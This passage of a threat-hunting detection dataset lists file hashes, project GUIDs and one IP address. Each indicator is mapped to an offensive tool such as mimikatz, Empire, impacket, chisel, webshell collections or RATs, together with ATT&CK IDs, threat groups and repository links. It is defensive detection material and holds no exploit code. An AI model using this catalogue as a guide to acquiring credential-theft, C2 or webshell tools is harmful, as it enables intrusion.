T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","21876" "*102083f916b833362439518408fa1e5f98a21ed600ed51ec19219d6f3fc92f21*",".{0,1000}102083f916b833362439518408fa1e5f98a21ed600ed51ec19219d6f3fc92f21.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","21877" "*10226b3b8594c981077a5e415bd98787c94b6f3f2ca48a50089fdf3f2c2547e8*",".{0,1000}10226b3b8594c981077a5e415bd98787c94b6f3f2ca48a50089fdf3f2c2547e8.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 
- FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","21878" "*10244cbbce7a1608b471e26612dbc9ed658d4dde66f5075d6becb5834df8af8b*",".{0,1000}10244cbbce7a1608b471e26612dbc9ed658d4dde66f5075d6becb5834df8af8b.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","21879" "*1027943da338f85a1aff09bb1825e4d4fe2579256cec951becbb5cebd5c60b72*",".{0,1000}1027943da338f85a1aff09bb1825e4d4fe2579256cec951becbb5cebd5c60b72.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - 
APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","21880" "*1027943da338f85a1aff09bb1825e4d4fe2579256cec951becbb5cebd5c60b72*",".{0,1000}1027943da338f85a1aff09bb1825e4d4fe2579256cec951becbb5cebd5c60b72.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential 
Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","21881" "*1029c62bf37caa9d15ae9a74c931cb9246d5c3ce33be94a0eb8e282b6249c9d8*",".{0,1000}1029c62bf37caa9d15ae9a74c931cb9246d5c3ce33be94a0eb8e282b6249c9d8.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","21882" "*104.131.124.203*",".{0,1000}104\.131\.124\.203.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","1","#ipaddress","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","21884" "*104e9d143fbe807efa94f576f0c400b222fbc6a76f64bc4764fb64abf154e7ff*",".{0,1000}104e9d143fbe807efa94f576f0c400b222fbc6a76f64bc4764fb64abf154e7ff.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","21885" "*1052d287bcc95797530ef9961bfb9d1af1c3419f302a65b4fac5cb32af3b813c*",".{0,1000}1052d287bcc95797530ef9961bfb9d1af1c3419f302a65b4fac5cb32af3b813c.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - 
T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","21886" "*105C2C6D-1C0A-4535-A231-80E355EFB112*",".{0,1000}105C2C6D\-1C0A\-4535\-A231\-80E355EFB112.{0,1000}","offensive_tool_keyword","RoguePotato","Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RoguePotato","1","0","#GUIDproject","N/A","10","10","1081","131","2021-01-09T20:43:07Z","2020-05-10T17:38:28Z","21888" "*106c6250321d09ba9fef27ccd9506234f00e00c23c6b1c7bc0541d42e96bfc25*",".{0,1000}106c6250321d09ba9fef27ccd9506234f00e00c23c6b1c7bc0541d42e96bfc25.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","21892" "*107206c062bac57f47d5dc16f65dfe22a709e375c537139da65bc52c014110d5*",".{0,1000}107206c062bac57f47d5dc16f65dfe22a709e375c537139da65bc52c014110d5.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","21893" "*10755f01684f2dfa48f5f096748c00ee21c272a8f1a558b021dc9a8298f3cc25*",".{0,1000}10755f01684f2dfa48f5f096748c00ee21c272a8f1a558b021dc9a8298f3cc25.{0,1000}","offensive_tool_keyword","SharpLocker","get current user credentials by 
popping a fake Windows lock screen","T1056.002 - T1204.002 - T1071.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/Pickfordmatt/SharpLocker","1","0","#filehash","N/A","10","7","616","145","2020-05-27T22:56:34Z","2019-05-31T11:16:38Z","21894" "*107EBC1B-0273-4B3D-B676-DE64B7F52B33*",".{0,1000}107EBC1B\-0273\-4B3D\-B676\-DE64B7F52B33.{0,1000}","offensive_tool_keyword","SharpPersistSD","A Post-Compromise granular .NET library to embed persistency to persistency by abusing Security Descriptors of remote machines","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/cybersectroll/SharpPersistSD","1","0","#GUIDproject","N/A","10","1","87","12","2024-05-15T14:55:14Z","2024-05-13T15:11:12Z","21897" "*10804539a495e0fcc79a6c2ab03e34d4b5c2bce1e134060839ff9b58dcfc1cf7*",".{0,1000}10804539a495e0fcc79a6c2ab03e34d4b5c2bce1e134060839ff9b58dcfc1cf7.{0,1000}","offensive_tool_keyword","Discord-RAT-2.0","Discord Remote Administration Tool fully written in c#, stub size of ~75kb with over 40 post exploitations modules","T1059.005 - T1105 - T1569.002 - T1027.001","TA0011 - TA0003 - TA0006 - TA0009 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/moom825/Discord-RAT-2.0","1","0","#filehash","N/A","10","10","512","115","2023-11-03T01:15:38Z","2022-07-15T20:09:56Z","21899" "*108243f61c53f00f8f1adcf67c387a8833f1a2149f063dd9ef29205c90a3c30a*",".{0,1000}108243f61c53f00f8f1adcf67c387a8833f1a2149f063dd9ef29205c90a3c30a.{0,1000}","offensive_tool_keyword","Smbtouch-Scanner","Smbtouch detect whether the target is vulnerable of one of these vulnerabilities: ETERNALBLUE - ETERNALCHAMPION - ETERNALROMANCE - ETERNALSYNERGY","T1210 - T1046 - T1133","TA0007 - TA0043 - TA0008","N/A","APT15 - Turla","Lateral Movement","https://github.com/3gstudent/Smbtouch-Scanner","1","0","#filehash","N/A","10","2","140","66","2021-04-17T01:42:06Z","2017-04-21T01:38:55Z","21900" 
"*1083596da1857862551870eb6fd06c26bdd2cac7698b27034f6cc8d773a3664b*",".{0,1000}1083596da1857862551870eb6fd06c26bdd2cac7698b27034f6cc8d773a3664b.{0,1000}","offensive_tool_keyword","chntpw","reset a password on your system","T1003 - T1078","TA0006","N/A","N/A","Credential Access","https://pogostick.net/~pnh/ntpasswd/chntpw-source-140201.zip","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","21901" "*1085654ad66ba105edeca8e068047afdcec8f3d35aaa2dc09cf5cb5518971e15*",".{0,1000}1085654ad66ba105edeca8e068047afdcec8f3d35aaa2dc09cf5cb5518971e15.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK 
SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","21903" "*1088033e8d7f6952244ca7ef7fa941d94ec1790974573b4c50b905514b1bc15c*",".{0,1000}1088033e8d7f6952244ca7ef7fa941d94ec1790974573b4c50b905514b1bc15c.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","21904" "*108f698dfd91153a0747d48513546fd9cda7dc55c992a4686692c13af339f686*",".{0,1000}108f698dfd91153a0747d48513546fd9cda7dc55c992a4686692c13af339f686.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#filehash","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","21905" "*10accf5038dd9a3353d50e63d208c684ddfe8df4d06b33602fada0f44a739039*",".{0,1000}10accf5038dd9a3353d50e63d208c684ddfe8df4d06b33602fada0f44a739039.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","21907" 
"*10b3addcd8d4ac13a05391a939b334d0a2f7586e34be79c3a89812c958cc7a5c*",".{0,1000}10b3addcd8d4ac13a05391a939b334d0a2f7586e34be79c3a89812c958cc7a5c.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","21909" "*10b405045647c01fa0cd316da07236cf1ee0c60675b7ab515734995efe28adcc*",".{0,1000}10b405045647c01fa0cd316da07236cf1ee0c60675b7ab515734995efe28adcc.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","21911" "*10c43cc3b33f427e0f720ec63a371dcf41bd25ad3bf69e01f255613b8d16fdc2*",".{0,1000}10c43cc3b33f427e0f720ec63a371dcf41bd25ad3bf69e01f255613b8d16fdc2.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","21912" "*10c9d70217e5a3915a6c09feea4110991dae5d9a1b6ae5d32c4d69dd6b6eaf50*",".{0,1000}10c9d70217e5a3915a6c09feea4110991dae5d9a1b6ae5d32c4d69dd6b6eaf50.{0,1000}","offensive_tool_keyword","lnk2pwn","Malicious Shortcut(.lnk) Generator","T1204 - T1059.007","TA0001 - 
TA0002","N/A","N/A","Phishing","https://github.com/it-gorillaz/lnk2pwn","1","0","#filehash","N/A","8","2","193","34","2018-11-23T17:18:49Z","2018-11-23T00:12:48Z","21914" "*10CC4D5B-DC87-4AEB-887B-E47367BF656B*",".{0,1000}10CC4D5B\-DC87\-4AEB\-887B\-E47367BF656B.{0,1000}","offensive_tool_keyword","FormThief","Spoofing desktop login applications with WinForms and WPF","T1204.002 - T1056.004 - T1071.001","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/mlcsec/FormThief","1","0","#GUIDproject","N/A","8","2","173","31","2024-02-19T22:40:09Z","2024-02-19T22:34:07Z","21915" "*10d06380c1904999c36072f962cfe380fe36488c3bcf1a2f485532de4d5bae5f*",".{0,1000}10d06380c1904999c36072f962cfe380fe36488c3bcf1a2f485532de4d5bae5f.{0,1000}","offensive_tool_keyword","mythic","Thanatos is a Windows and Linux C2 agent written in rust.","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/thanatos","1","0","#filehash","N/A","10","10","333","49","2024-12-19T19:07:03Z","2022-03-07T20:35:33Z","21916" "*10db57856d86b6cef6402c0897efb13cbd5455158f5bfb4497fed570ced9b93c*",".{0,1000}10db57856d86b6cef6402c0897efb13cbd5455158f5bfb4497fed570ced9b93c.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","21918" "*10dbc6cb2d71505d7add5a2927228077142851657f2578b9c774656505338d32*",".{0,1000}10dbc6cb2d71505d7add5a2927228077142851657f2578b9c774656505338d32.{0,1000}","offensive_tool_keyword","atexec-pro","Fileless atexec for lateral movement","T1021.002 - T1105","TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Ridter/atexec-pro","1","0","#filehash","N/A","10","4","366","45","2024-03-28T03:36:50Z","2024-03-27T09:15:00Z","21919" "*10de4ed7588b4a7e75d01bb69f0b602b0c298a2f9f993a6a8f4e2248031699fb*",".{0,1000}10de4ed7588b4a7e75d01bb69f0b602b0c298a2f9f993a6a8f4e2248031699fb.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting 
Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","#filehash","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","21920" "*10e8116f55fa82a8b6517d2b8b2534744ef8477891d7999711dfdaf4a2297d4d*",".{0,1000}10e8116f55fa82a8b6517d2b8b2534744ef8477891d7999711dfdaf4a2297d4d.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","21921" "*10f1654ada84329ad352c7a0879ca49659d8df9a1da87a19ec16d75de2661fab*",".{0,1000}10f1654ada84329ad352c7a0879ca49659d8df9a1da87a19ec16d75de2661fab.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","21922" "*10f1654ada84329ad352c7a0879ca49659d8df9a1da87a19ec16d75de2661fab*",".{0,1000}10f1654ada84329ad352c7a0879ca49659d8df9a1da87a19ec16d75de2661fab.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","21923" "*10f1654ada84329ad352c7a0879ca49659d8df9a1da87a19ec16d75de2661fab*",".{0,1000}10f1654ada84329ad352c7a0879ca49659d8df9a1da87a19ec16d75de2661fab.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* 
- PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","21924" "*10f1654ada84329ad352c7a0879ca49659d8df9a1da87a19ec16d75de2661fab*",".{0,1000}10f1654ada84329ad352c7a0879ca49659d8df9a1da87a19ec16d75de2661fab.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","21925" "*10f1654ada84329ad352c7a0879ca49659d8df9a1da87a19ec16d75de2661fab*",".{0,1000}10f1654ada84329ad352c7a0879ca49659d8df9a1da87a19ec16d75de2661fab.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","21926" "*10f1654ada84329ad352c7a0879ca49659d8df9a1da87a19ec16d75de2661fab*",".{0,1000}10f1654ada84329ad352c7a0879ca49659d8df9a1da87a19ec16d75de2661fab.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","21927" "*10f1654ada84329ad352c7a0879ca49659d8df9a1da87a19ec16d75de2661fab*",".{0,1000}10f1654ada84329ad352c7a0879ca49659d8df9a1da87a19ec16d75de2661fab.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts 
suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","21928" "*10f1654ada84329ad352c7a0879ca49659d8df9a1da87a19ec16d75de2661fab*",".{0,1000}10f1654ada84329ad352c7a0879ca49659d8df9a1da87a19ec16d75de2661fab.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","21929" "*10f1654ada84329ad352c7a0879ca49659d8df9a1da87a19ec16d75de2661fab*",".{0,1000}10f1654ada84329ad352c7a0879ca49659d8df9a1da87a19ec16d75de2661fab.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","21930" "*10f310ef3189c07c1581a727a6edcd86c9b650f68c2a933cf7af272bf3acf9e5*",".{0,1000}10f310ef3189c07c1581a727a6edcd86c9b650f68c2a933cf7af272bf3acf9e5.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","21931" "*10f86295406d71ec27ef38e6f0f9f4d8ddc14e65a662716de879373ffa7248ec*",".{0,1000}10f86295406d71ec27ef38e6f0f9f4d8ddc14e65a662716de879373ffa7248ec.{0,1000}","offensive_tool_keyword","Forensia","Anti Forensics Tool For Red Teamers 
